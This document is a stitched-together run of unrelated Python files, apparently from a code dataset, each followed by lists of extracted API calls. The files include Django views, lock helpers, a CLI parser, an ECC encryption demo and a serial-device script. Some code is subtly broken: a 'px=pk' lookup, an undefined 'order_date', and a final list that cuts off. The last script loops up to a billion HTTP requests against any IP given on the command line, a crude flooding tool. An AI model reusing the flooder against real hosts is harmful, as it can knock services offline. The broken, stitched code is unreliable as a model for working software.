print("Adding the URLs...")
text_file_r = open(text, "r", encoding='utf-8')
n = 0
for url in text_file_r:
if url.strip('\n') not in already:
title, link = Get_Video_URL(url)
video_file = open(video_file_name, "a", encoding='utf-8')
video_file.write("%s : %s" % (title, link))
video_file.close()
n += 1
text_file_r.close()
print("---------------------------------------------------")
print("There are %d videos in total" % len(sz))
print("There are", n, "new URLs added")
print("---------------------------------------------------")
else:
print('Creating file:', video_file_name)
video_file = open(video_file_name, "w", encoding='utf-8')
video_file.close()
print("Writing the URLs...")
text_file_r = open(text, "r", encoding='utf-8')
n = 0
for url in text_file_r:
title, link = Get_Video_URL(url)
video_file = open(video_file_name, "a", encoding='utf-8')
video_file.write("%s : %s\n" % (title, link))
video_file.close()
n += 1
text_file_r.close()
print("---------------------------------------------------")
print("There are %d videos in total" % len(sz))
print("There are", n, "written")
print("---------------------------------------------------")
print("Finished!!!")
| [
"os.path.isfile",
"selenium.webdriver.Chrome",
"time.sleep"
] | [((1636, 1667), 'os.path.isfile', 'os.path.isfile', (['video_file_name'], {}), '(video_file_name)\n', (1650, 1667), False, 'import os\n'), ((540, 558), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (556, 558), False, 'from selenium import webdriver\n'), ((910, 923), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (920, 923), False, 'import time\n')] |
import datetime
from django.utils.timezone import now
from django.db.utils import IntegrityError
from django.db import transaction
from .models import Lock
def clear_expired_locks():
now_time = now()
with transaction.atomic():
Lock.objects.filter(expire_time__lte=now_time).delete()
def acquire_lock(lock_name, worker_name, timeout):
clear_expired_locks()
lock = Lock()
lock.lock_name = lock_name
lock.worker_name = worker_name
lock.lock_time = now()
lock.expire_time = lock.lock_time + datetime.timedelta(seconds=timeout)
try:
with transaction.atomic():
lock.save()
return True
except IntegrityError:
return False
def release_lock(lock_name, worker_name):
clear_expired_locks()
try:
lock = Lock.objects.get(lock_name=lock_name, worker_name=worker_name)
with transaction.atomic():
lock.delete()
return True
except Lock.DoesNotExist:
return True
return False
def get_lock_info(lock_name):
try:
lock = Lock.objects.get(lock_name=lock_name)
return {
"pk": lock.pk,
"lock_name": lock.lock_name,
"worker_name": lock.worker_name,
"lock_time": lock.lock_time,
"expire_time": lock.expire_time,
}
except Lock.DoesNotExist:
return None
| [
"django.utils.timezone.now",
"datetime.timedelta",
"django.db.transaction.atomic"
] | [((200, 205), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (203, 205), False, 'from django.utils.timezone import now\n'), ((485, 490), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (488, 490), False, 'from django.utils.timezone import now\n'), ((215, 235), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (233, 235), False, 'from django.db import transaction\n'), ((531, 566), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'timeout'}), '(seconds=timeout)\n', (549, 566), False, 'import datetime\n'), ((589, 609), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (607, 609), False, 'from django.db import transaction\n'), ((873, 893), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (891, 893), False, 'from django.db import transaction\n')] |
import os
from argparse import RawTextHelpFormatter, ArgumentTypeError, ArgumentParser
from cfg_exporter.const import ExportType, ExtensionType, TEMPLATE_EXTENSION
def valid_source(source):
if os.path.exists(source):
return source
else:
raise ArgumentTypeError(_('the source path does not exists `{source}`').format(source=source))
def valid_export(export):
if export in ExportType.__members__:
return ExportType[export]
else:
raise ArgumentTypeError(_('the export file type does not exits {export}').format(export=export))
def valid_table(row_num):
try:
row_num = int(row_num)
assert row_num > 0
return row_num
except (ValueError, AssertionError):
raise ArgumentTypeError(_('{row_num} is not a valid line number').format(row_num=row_num))
def valid_lang_template(lang_template):
if os.path.exists(lang_template):
return lang_template
else:
raise ArgumentTypeError(_('the lang template path does not exists `{lang_template}`')
.format(source=lang_template))
parser = ArgumentParser(description=_('Configuration table export toolset'), formatter_class=RawTextHelpFormatter)
base_group = parser.add_argument_group(title=_('Base options'))
base_group.add_argument('--clear_dir', default=False, action='store_true',
help=_('clear the output directory.'))
base_group.add_argument('--exclude_files', default=[], nargs="*",
help=_('specify a list of file names not to load.'))
base_group.add_argument('-e', '--export_type', type=valid_export,
metavar=f'[{",".join(ExportType.__members__.keys())}]',
help=_('specify the configuration table export type.'))
base_group.add_argument('--file_prefix', default='',
help=_('specify the prefix of the output filename.'))
base_group.add_argument('--force', default=False, action='store_true',
help=_('force all configuration tables to be generated.'))
base_group.add_argument('-o', '--output', type=str, default="",
help=_('specify the configuration table output path.'))
base_group.add_argument('-r', '--recursive', default=False, action='store_true',
help=_('recursively search the source path.'))
base_group.add_argument('--verification', default=False, action='store_true',
help=_('verify only the correctness of the configuration table.'))
base_group.add_argument('-s', '--source', type=valid_source, required=True,
help=_(
'specify the configuration table source path.\nsupported file types [{extensions}]').format(
extensions=",".join(ExtensionType.__members__.keys())))
base_group.add_argument('--template_path',
help=_('specify the extension template path.\n'
'the template name consists of the table name, export type, '
'and {template_extension} extension\n'
'e.g:\n'
'`item.erl.{template_extension}` `item.hrl.{template_extension}` '
'`item.lua.{template_extension}`\n'
'loads the template based on the specified export type\n'
'e.g:\n'
'`--export_type erl` templates ending with `.erl.{template_extension}` '
'and `.hrl.{template_extension}` will be loaded\n'
'`--export_type lua` templates ending with `.lua.{template_extension}` will be loaded'
).format(template_extension=TEMPLATE_EXTENSION))
base_group.add_argument('--verbose', default=False, action='store_true',
help=_('show the details.'))
table_group = parser.add_argument_group(title=_('Table options'))
table_group.add_argument('--data_row', type=valid_table, required=True,
help=_('specify the start line number of the configuration table body data.'))
table_group.add_argument('--desc_row', type=valid_table,
help=_('specify the line number of the configuration table column description.'))
table_group.add_argument('--field_row', type=valid_table, required=True,
help=_('specify the line number of the configuration table field name.'))
table_group.add_argument('--rule_row', type=valid_table,
help=_('specify the line number of the configuration table check rule.'))
table_group.add_argument('--type_row', type=valid_table, required=True,
help=_('specify the line number of the configuration table data type.'))
lang_group = parser.add_argument_group(title=_('Multi languages options'))
lang_group.add_argument('--lang_template', type=valid_lang_template,
help=_('specify the language template path.'))
lang_group.add_argument('--export_lang_template',
help=_('output language template.'))
csv_group = parser.add_argument_group(title=_('CSV options'))
csv_group.add_argument('--csv_encoding', default='utf-8-sig', metavar='ENCODING',
help=_('specify the default encoding format for CSV files.\nDEFAULT UTF-8'))
erl_group = parser.add_argument_group(title=_('Erlang options'))
erl_group.add_argument('--erl_dir', default='',
help=_('specify output directory for where to generate the .erl.'))
erl_group.add_argument('--hrl_dir', default='',
help=_('specify output directory for where to generate the .hrl.'))
lua_group = parser.add_argument_group(title=_('LUA options'))
lua_group.add_argument('--lua_optimize', default=False, action='store_true',
help=_('remove default value fields ( store them into metatable ) '
'and reuse all table values to save memory'))
py_group = parser.add_argument_group(title=_('PYTHON options'))
py_group.add_argument('--py_optimize', default=False, action='store_true',
help=_('remove default value fields and reuse all table values to save memory'))
args = parser.parse_args()
__all__ = ('args',)
| [
"os.path.exists",
"cfg_exporter.const.ExportType.__members__.keys",
"cfg_exporter.const.ExtensionType.__members__.keys"
] | [((200, 222), 'os.path.exists', 'os.path.exists', (['source'], {}), '(source)\n', (214, 222), False, 'import os\n'), ((884, 913), 'os.path.exists', 'os.path.exists', (['lang_template'], {}), '(lang_template)\n', (898, 913), False, 'import os\n'), ((1688, 1717), 'cfg_exporter.const.ExportType.__members__.keys', 'ExportType.__members__.keys', ([], {}), '()\n', (1715, 1717), False, 'from cfg_exporter.const import ExportType, ExtensionType, TEMPLATE_EXTENSION\n'), ((2836, 2868), 'cfg_exporter.const.ExtensionType.__members__.keys', 'ExtensionType.__members__.keys', ([], {}), '()\n', (2866, 2868), False, 'from cfg_exporter.const import ExportType, ExtensionType, TEMPLATE_EXTENSION\n')] |
from unittest import TestCase
import vivino.data.geojson.serialiser as ser
from vivino.data.model.winery import Winery
from shapely_geojson import Feature
from shapely.geometry import Point
import json
class TestSerialiser(TestCase):
def test_serialise(self):
serialised = ser.serialise(Winery("<NAME>", 17.0118954, 45.5643442, 2))
jsonres = json.loads(serialised)
self.assertEqual(jsonres['type'], 'Feature')
self.assertEqual(jsonres['geometry']['type'], 'Point')
self.assertEqual(jsonres['geometry']['coordinates'][0], 45.5643442)
self.assertEqual(jsonres['geometry']['coordinates'][1], 17.0118954)
self.assertEqual(jsonres['properties']['name'], '<NAME>')
self.assertEqual(jsonres['properties']['count'], 2)
def test_create_feature(self):
feature = ser.create_feature(Winery("<NAME>", 17.0118954, 45.5643442, 2))
self.assertTrue(isinstance(feature, Feature))
self.assertEqual(feature.properties['name'], '<NAME>')
self.assertEqual(feature.properties['count'], 2)
self.assertTrue(isinstance(feature.geometry, Point))
self.assertEqual(feature.geometry.coords[0], (45.5643442, 17.0118954))
| [
"json.loads",
"vivino.data.model.winery.Winery"
] | [((372, 394), 'json.loads', 'json.loads', (['serialised'], {}), '(serialised)\n', (382, 394), False, 'import json\n'), ((308, 351), 'vivino.data.model.winery.Winery', 'Winery', (['"""<NAME>"""', '(17.0118954)', '(45.5643442)', '(2)'], {}), "('<NAME>', 17.0118954, 45.5643442, 2)\n", (314, 351), False, 'from vivino.data.model.winery import Winery\n'), ((870, 913), 'vivino.data.model.winery.Winery', 'Winery', (['"""<NAME>"""', '(17.0118954)', '(45.5643442)', '(2)'], {}), "('<NAME>', 17.0118954, 45.5643442, 2)\n", (876, 913), False, 'from vivino.data.model.winery import Winery\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[2]:
# import matplotlib.pyplot as plt
# from scipy import interpolate
import numpy as np
# step = np.array([12, 6, 4, 3, 2])
# MAP5 = np.array([0.6480, 0.6797, 0.6898, 0.6921, 0.6982])
# step_new = np.arange(step.min(), step.max(), 0.1)
# # step_new = np.arange(2, 11, 0.1)
# func = interpolate.interp1d(step, MAP5, kind='cubic', fill_value="extrapolate")
# MAP5_new = func(step_new)
# plt.figure(figsize=(10,10))
# ax1 = plt.subplot(2,1,2)
# plt.sca(ax1)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.xlabel("KEY-FRAME STEP", fontsize=16)
# plt.ylabel("MAP@5", fontsize=16)
# plt.title("MVOF STEP-MAP@5 CURVE", fontsize=16)
# plt.plot(step_new, MAP5_new, label="$MVOF\quad MAP@5$", linestyle='--')
# plt.scatter(step, MAP5, color="g")
# plt.hlines(0.7026, 13, 2, colors = "r", linestyles = "--", label="$DFF\qquad MAP@5$")
# plt.legend(loc="lower left", fontsize=16)
# ax2 = plt.subplot(2,1,1)
# plt.sca(ax2)
# the_table = plt.table(cellText=[list(np.flip(step, 0)), list(np.flip(MAP5, 0))],
# rowLabels=["STEP", "MAP@5"],
# # colLabels=list(np.flip(step, 0)),
# loc='lower center')
# the_table.set_fontsize(18)
# the_table.scale(1, 2)
# plt.axis('off')
# plt.show()
# In[4]:
import pickle
diffs = []
mvs = []
flows = []
for i in range(602):
try:
flow = pickle.load(open("/home/jingtun/feat_flow_compare/flow_%06d.pkl" % i, 'rb'))
mv = pickle.load(open("/home/jingtun/feat_flow_compare/mv_%06d.pkl" % i, 'rb'))
diff = flow - mv
diffs.append(np.mean(abs(diff)))
mvs.append(np.mean(abs(mv)))
flows.append(np.mean(abs(flow)))
except:
print("not fit")
print("diff abs mean : ", np.mean(diffs))
print("mv abs mean : ", np.mean(mvs))
print("flow abs mean : ", np.mean(flows))
| [
"numpy.mean"
] | [((1794, 1808), 'numpy.mean', 'np.mean', (['diffs'], {}), '(diffs)\n', (1801, 1808), True, 'import numpy as np\n'), ((1834, 1846), 'numpy.mean', 'np.mean', (['mvs'], {}), '(mvs)\n', (1841, 1846), True, 'import numpy as np\n'), ((1874, 1888), 'numpy.mean', 'np.mean', (['flows'], {}), '(flows)\n', (1881, 1888), True, 'import numpy as np\n')] |
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import JsonResponse
from django.core.mail import BadHeaderError, EmailMessage
from django.template.loader import get_template
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect
from django.views.decorators.csrf import csrf_exempt
from django.utils.encoding import force_bytes
import requests
import hmac
from hashlib import sha1
from ipaddress import ip_address, ip_network
from django.views.decorators.http import require_POST
from .forms import ContactForm
def Home(request):
if request.get_full_path() == "/en/" or 'www' in request.get_host():
return redirect('olora_frontend:homeen')
else:
return redirect('olora_frontend:homekn')
def home_en(request):
return render(request, 'olora_frontend/index.html')
def home_kn(request):
return render(request, 'olora_frontend/index.kn.html')
@require_POST
def contact_us(request):
if request.method == 'POST':
form = ContactForm(request.POST)
if form.is_valid() and request.is_ajax():
subject = form.cleaned_data['subject']
email = form.cleaned_data['email']
message = form.cleaned_data['message']
name = form.cleaned_data['name']
template = get_template('olora_frontend/contact_template.txt')
context = {
'name': name,
'email': email,
'message': message
}
content = template.render(context)
try:
email = EmailMessage(
subject,
content,
settings.SERVER_EMAIL,
['<EMAIL>'],
headers={'Reply-To': email}
)
email.send()
form.save()
except BadHeaderError:
return JsonResponse({"message": "error"})
return JsonResponse({"message": "success"})
@require_POST
@csrf_exempt
def AutomateDeployment(request):
# Verify if request came from GitHub
forwarded_for = u'{}'.format(request.META.get('HTTP_X_FORWARDED_FOR'))
client_ip_address = ip_address(forwarded_for)
whitelist = requests.get('https://api.github.com/meta').json()['hooks']
for valid_ip in whitelist:
if client_ip_address in ip_network(valid_ip):
break
else:
return HttpResponseForbidden('Permission denied.')
# Verify the request signature
header_signature = request.META.get('HTTP_X_HUB_SIGNATURE')
if header_signature is None:
return HttpResponseForbidden('Permission denied.')
sha_name, signature = header_signature.split('=')
if sha_name != 'sha1':
return HttpResponseServerError('Operation not supported.', status=501)
mac = hmac.new(force_bytes(settings.GITHUB_WEBHOOK_KEY), msg=force_bytes(request.body), digestmod=sha1)
if not hmac.compare_digest(force_bytes(mac.hexdigest()), force_bytes(signature)):
return HttpResponseForbidden('Permission denied.')
# Process the GitHub events
event = request.META.get('HTTP_X_GITHUB_EVENT', 'ping')
if event == 'ping':
return HttpResponse('pong')
elif event == 'push':
# Do something...
return HttpResponse('success')
return HttpResponse('pong')
| [
"django.shortcuts.render",
"django.http.JsonResponse",
"django.http.HttpResponse",
"django.http.HttpResponseForbidden",
"requests.get",
"ipaddress.ip_network",
"django.utils.encoding.force_bytes",
"django.shortcuts.redirect",
"django.http.HttpResponseServerError",
"django.core.mail.EmailMessage",
... | [((836, 880), 'django.shortcuts.render', 'render', (['request', '"""olora_frontend/index.html"""'], {}), "(request, 'olora_frontend/index.html')\n", (842, 880), False, 'from django.shortcuts import render, redirect\n'), ((914, 961), 'django.shortcuts.render', 'render', (['request', '"""olora_frontend/index.kn.html"""'], {}), "(request, 'olora_frontend/index.kn.html')\n", (920, 961), False, 'from django.shortcuts import render, redirect\n'), ((2237, 2262), 'ipaddress.ip_address', 'ip_address', (['forwarded_for'], {}), '(forwarded_for)\n', (2247, 2262), False, 'from ipaddress import ip_address, ip_network\n'), ((3375, 3395), 'django.http.HttpResponse', 'HttpResponse', (['"""pong"""'], {}), "('pong')\n", (3387, 3395), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((717, 750), 'django.shortcuts.redirect', 'redirect', (['"""olora_frontend:homeen"""'], {}), "('olora_frontend:homeen')\n", (725, 750), False, 'from django.shortcuts import render, redirect\n'), ((770, 803), 'django.shortcuts.redirect', 'redirect', (['"""olora_frontend:homekn"""'], {}), "('olora_frontend:homekn')\n", (778, 803), False, 'from django.shortcuts import render, redirect\n'), ((1998, 2034), 'django.http.JsonResponse', 'JsonResponse', (["{'message': 'success'}"], {}), "({'message': 'success'})\n", (2010, 2034), False, 'from django.http import JsonResponse\n'), ((2468, 2511), 'django.http.HttpResponseForbidden', 'HttpResponseForbidden', (['"""Permission denied."""'], {}), "('Permission denied.')\n", (2489, 2511), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((2660, 2703), 'django.http.HttpResponseForbidden', 'HttpResponseForbidden', (['"""Permission denied."""'], {}), "('Permission denied.')\n", (2681, 2703), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((2801, 2864), 'django.http.HttpResponseServerError', 'HttpResponseServerError', (['"""Operation not supported."""'], {'status': '(501)'}), "('Operation not supported.', status=501)\n", (2824, 2864), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((2885, 2925), 'django.utils.encoding.force_bytes', 'force_bytes', (['settings.GITHUB_WEBHOOK_KEY'], {}), '(settings.GITHUB_WEBHOOK_KEY)\n', (2896, 2925), False, 'from django.utils.encoding import force_bytes\n'), ((3075, 3118), 'django.http.HttpResponseForbidden', 'HttpResponseForbidden', (['"""Permission denied."""'], {}), "('Permission denied.')\n", (3096, 3118), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((3252, 3272), 'django.http.HttpResponse', 'HttpResponse', (['"""pong"""'], {}), "('pong')\n", (3264, 3272), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((1344, 1395), 'django.template.loader.get_template', 'get_template', (['"""olora_frontend/contact_template.txt"""'], {}), "('olora_frontend/contact_template.txt')\n", (1356, 1395), False, 'from django.template.loader import get_template\n'), ((2403, 2423), 'ipaddress.ip_network', 'ip_network', (['valid_ip'], {}), '(valid_ip)\n', (2413, 2423), False, 'from ipaddress import ip_address, ip_network\n'), ((2931, 2956), 'django.utils.encoding.force_bytes', 'force_bytes', (['request.body'], {}), '(request.body)\n', (2942, 2956), False, 'from django.utils.encoding import force_bytes\n'), ((3035, 3057), 'django.utils.encoding.force_bytes', 'force_bytes', (['signature'], {}), '(signature)\n', (3046, 3057), False, 'from django.utils.encoding import force_bytes\n'), ((3340, 3363), 'django.http.HttpResponse', 'HttpResponse', (['"""success"""'], {}), "('success')\n", (3352, 3363), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((1619, 1719), 'django.core.mail.EmailMessage', 'EmailMessage', (['subject', 'content', 'settings.SERVER_EMAIL', "['<EMAIL>']"], {'headers': "{'Reply-To': email}"}), "(subject, content, settings.SERVER_EMAIL, ['<EMAIL>'], headers=\n {'Reply-To': email})\n", (1631, 1719), False, 'from django.core.mail import BadHeaderError, EmailMessage\n'), ((2279, 2322), 'requests.get', 'requests.get', (['"""https://api.github.com/meta"""'], {}), "('https://api.github.com/meta')\n", (2291, 2322), False, 'import requests\n'), ((1948, 1982), 'django.http.JsonResponse', 'JsonResponse', (["{'message': 'error'}"], {}), "({'message': 'error'})\n", (1960, 1982), False, 'from django.http import JsonResponse\n')] |
from django.shortcuts import render , get_object_or_404, redirect
from django.http import HttpResponse
from .models import About
from django.contrib import messages
from django.views.generic import ListView, DetailView
from django.utils import timezone
from .models import (
Item, Order, OrderItem
)
# Create your views here.
def home(request):
return render(request, '../templates/home.html', {'title': 'Home'})
def about(request):
return render(request, '../templates/about.html', {'title': 'About'})
def milestone_17(request):
return render(request, '../templates/milestone_17.html', {'title': 'Milestone 17'})
def forsale(request):
return render(request, '../templates/forsale.html', {'title': 'For Sale'})
class HomeView(ListView):
model= Item
template_name = "home.html"
class ProductView(DetailView):
model = Item
template_name = "product.html"
def add_to_cart(request, pk):
item = get_object_or_404(Item,pk = pk)
order_item,created= OrderItem.objects.get_or_create(item= item, user=request.user, ordered = False)
order_qs = Order.objects.filter(user = request.user, ordered = False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__pk=item.pk).exists():
order_item.quantity += 1
order_item.save()
messages.info(request, "Added Quantity Item!")
return redirect("home:product", pk = pk)
else:
order.items.add(order_item)
messages.info(request,"ITem added to your cart")
return redirect("home:product",pk=pk)
else:
ordered_date=timezone.now()
order=Order.objects.create(user=request.user,order_date=order_date)
order.items.add(order_item)
messages.info(request,"items added to your cart")
return redirect("home:product",pk=pk)
def remove_from_cart(request,pk):
item = get_object_or_404(Item, px=pk)
order_qs=Order.objects.filter(user=request.user,ordered=False)
if order_qs.exists():
order=order_qs[0]
if order.items.filter(item__pk= item.pk).exists():
order_item=OrderItem.objects.filter(item=item,user=request.user,ordered=False)[0]
order_item.delete()
messages.info(request,"Item \""+ order_item.item.item_name+"\"removed from your cart")
return redirect("home:product")
else:
messages.info(request,"this item not in your cart")
return redirect("home:product",pk=pk)
else:
messages.info(request,"you do not have an order")
return redirect("home:product",pk=pk)
| [
"django.shortcuts.render",
"django.shortcuts.get_object_or_404",
"django.contrib.messages.info",
"django.utils.timezone.now",
"django.shortcuts.redirect"
] | [((356, 416), 'django.shortcuts.render', 'render', (['request', '"""../templates/home.html"""', "{'title': 'Home'}"], {}), "(request, '../templates/home.html', {'title': 'Home'})\n", (362, 416), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((449, 511), 'django.shortcuts.render', 'render', (['request', '"""../templates/about.html"""', "{'title': 'About'}"], {}), "(request, '../templates/about.html', {'title': 'About'})\n", (455, 511), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((551, 627), 'django.shortcuts.render', 'render', (['request', '"""../templates/milestone_17.html"""', "{'title': 'Milestone 17'}"], {}), "(request, '../templates/milestone_17.html', {'title': 'Milestone 17'})\n", (557, 627), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((662, 729), 'django.shortcuts.render', 'render', (['request', '"""../templates/forsale.html"""', "{'title': 'For Sale'}"], {}), "(request, '../templates/forsale.html', {'title': 'For Sale'})\n", (668, 729), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((931, 961), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Item'], {'pk': 'pk'}), '(Item, pk=pk)\n', (948, 961), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1905, 1935), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Item'], {'px': 'pk'}), '(Item, px=pk)\n', (1922, 1935), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1628, 1642), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1640, 1642), False, 'from django.utils import timezone\n'), ((1763, 1813), 'django.contrib.messages.info', 'messages.info', (['request', '"""items added to your cart"""'], {}), "(request, 'items added to your cart')\n", (1776, 1813), False, 'from django.contrib import messages\n'), ((1828, 1859), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (1836, 1859), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((2529, 2579), 'django.contrib.messages.info', 'messages.info', (['request', '"""you do not have an order"""'], {}), "(request, 'you do not have an order')\n", (2542, 2579), False, 'from django.contrib import messages\n'), ((2594, 2625), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (2602, 2625), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1332, 1378), 'django.contrib.messages.info', 'messages.info', (['request', '"""Added Quantity Item!"""'], {}), "(request, 'Added Quantity Item!')\n", (1345, 1378), False, 'from django.contrib import messages\n'), ((1398, 1429), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (1406, 1429), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1498, 1547), 'django.contrib.messages.info', 'messages.info', (['request', '"""ITem added to your cart"""'], {}), "(request, 'ITem added to your cart')\n", (1511, 1547), False, 'from django.contrib import messages\n'), ((1566, 1597), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (1574, 1597), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((2252, 2344), 'django.contrib.messages.info', 'messages.info', (['request', '(\'Item "\' + order_item.item.item_name + \'"removed from your cart\')'], {}), '(request, \'Item "\' + order_item.item.item_name +\n \'"removed from your cart\')\n', (2265, 2344), False, 'from django.contrib import messages\n'), ((2358, 2382), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {}), "('home:product')\n", (2366, 2382), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((2409, 2461), 'django.contrib.messages.info', 'messages.info', (['request', '"""this item not in your cart"""'], {}), "(request, 'this item not in your cart')\n", (2422, 2461), False, 'from django.contrib import messages\n'), ((2480, 2511), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (2488, 2511), False, 'from django.shortcuts import render, get_object_or_404, redirect\n')] |
from __future__ import print_function
from expresso.libs.expresso_serial import ExpressoSerial
import sys
port = sys.argv[1]
number = int(sys.argv[2])
print()
print('setting device ID')
print(' port = {0}'.format(port))
print(' number = {0}'.format(number))
print()
dev = ExpressoSerial(port,checkId=False)
dev.setDeviceId(number)
print('fetching device ID')
dev_id = dev.getDeviceId()
print(' device ID = {0}'.format(dev_id))
print()
| [
"expresso.libs.expresso_serial.ExpressoSerial"
] | [((281, 316), 'expresso.libs.expresso_serial.ExpressoSerial', 'ExpressoSerial', (['port'], {'checkId': '(False)'}), '(port, checkId=False)\n', (295, 316), False, 'from expresso.libs.expresso_serial import ExpressoSerial\n')] |
from Crypto.Cipher import AES
from Crypto.PublicKey import ECC
from Crypto.Math.Numbers import Integer
import os
import hashlib
def ecc_point_to_256_bit_key(point):
sha = hashlib.sha256(point.x.to_bytes())
sha.update(point.y.to_bytes())
return sha.digest()
def ecc_encrypt(plain_text, ecc_public_key):
ecc_shared_key = ECC.generate(curve='P-256')
aes_key = ecc_point_to_256_bit_key(ecc_public_key.pointQ * ecc_shared_key.d)
cipher = AES.new(aes_key, AES.MODE_GCM)
nonce = cipher.nonce
cipher_text = cipher.encrypt(plain_text)
return cipher_text, ecc_shared_key.public_key().export_key(format='PEM'), nonce
def ecc_decrypt(cipher_text, ecc_private_key, shared_key, nonce):
ecc_shared_key = ECC.import_key(shared_key)
aes_key = ecc_point_to_256_bit_key(ecc_private_key.d * ecc_shared_key.pointQ)
cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)
plain_text = cipher.decrypt(cipher_text)
return plain_text
ecc_private_key = ECC.generate(curve='P-256')
ecc_public_key = ecc_private_key.public_key()
data = b'kho6ngcogi'
cipher_text, shared, nonce = ecc_encrypt(data, ecc_public_key)
plain_text = ecc_decrypt(cipher_text, ecc_private_key, shared, nonce)
print(data == plain_text)
passphrase = '<PASSWORD>'
f = open('private.pem', 'wt')
f.write(ecc_private_key.export_key(format='PEM', protection='PBKDF2WithHMAC-SHA1AndAES128-CBC', passphrase=passphrase))
f.close()
f = open('public.pem', 'wt')
f.write(ecc_public_key.export_key(format='PEM'))
f.close()
| [
"Crypto.PublicKey.ECC.generate",
"Crypto.Cipher.AES.new",
"Crypto.PublicKey.ECC.import_key"
] | [((985, 1012), 'Crypto.PublicKey.ECC.generate', 'ECC.generate', ([], {'curve': '"""P-256"""'}), "(curve='P-256')\n", (997, 1012), False, 'from Crypto.PublicKey import ECC\n'), ((338, 365), 'Crypto.PublicKey.ECC.generate', 'ECC.generate', ([], {'curve': '"""P-256"""'}), "(curve='P-256')\n", (350, 365), False, 'from Crypto.PublicKey import ECC\n'), ((460, 490), 'Crypto.Cipher.AES.new', 'AES.new', (['aes_key', 'AES.MODE_GCM'], {}), '(aes_key, AES.MODE_GCM)\n', (467, 490), False, 'from Crypto.Cipher import AES\n'), ((733, 759), 'Crypto.PublicKey.ECC.import_key', 'ECC.import_key', (['shared_key'], {}), '(shared_key)\n', (747, 759), False, 'from Crypto.PublicKey import ECC\n'), ((855, 898), 'Crypto.Cipher.AES.new', 'AES.new', (['aes_key', 'AES.MODE_GCM'], {'nonce': 'nonce'}), '(aes_key, AES.MODE_GCM, nonce=nonce)\n', (862, 898), False, 'from Crypto.Cipher import AES\n')] |
from tornado import ioloop
import time
import requests
import sys
import requests
import re
s = time.time()
maxRequestCount = 1000000000
i = 0
c = 0
# Takes destination ip as command line input
if len(sys.argv) > 1:
if re.match("^http", sys.argv[1]):
ip = sys.argv[1]
else:
ip = "http://" + sys.argv[1]
else:
ip = "http://localhost:8070/"
# ip = "http://localhost:8071/"
# Suppresses the error from printing
class DevNull:
i = 0
c = 0
def write(self, msg):
pass
# This part of code isn't working, check it out.
'''
for j in range(1, 20):
i += 1
c += 1
print(c)
handle_request()
'''
#sys.stderr = DevNull()
def handle_request():
print("Processing ip = " + ip)
res = requests.get(ip)
global i
i -= 1
# Must be used when client count is increased.
#time.sleep(0.2)
if i == 0:
ioloop.IOLoop.instance().stop()
#1000 client requests are processed in 4 seconds.
for j in range(maxRequestCount):
i += 1
c += 1
#print(c)
handle_request()
try:
ioloop.IOLoop.instance().start()
except ConnectionRefusedError:
#pass
print("Interrupt occured, taking break for 2 seconds.")
time.sleep(2)
# This loop isn't running, check it out !!
try:
for q in range(j, 1000):
i += 1
c += 1
#print(c)
handle_request()
except ConnectionRefusedError:
print("Over dude")
pass
print("Time taken to process = " + str(time.time() - s)) | [
"re.match",
"time.sleep",
"requests.get",
"tornado.ioloop.IOLoop.instance",
"time.time"
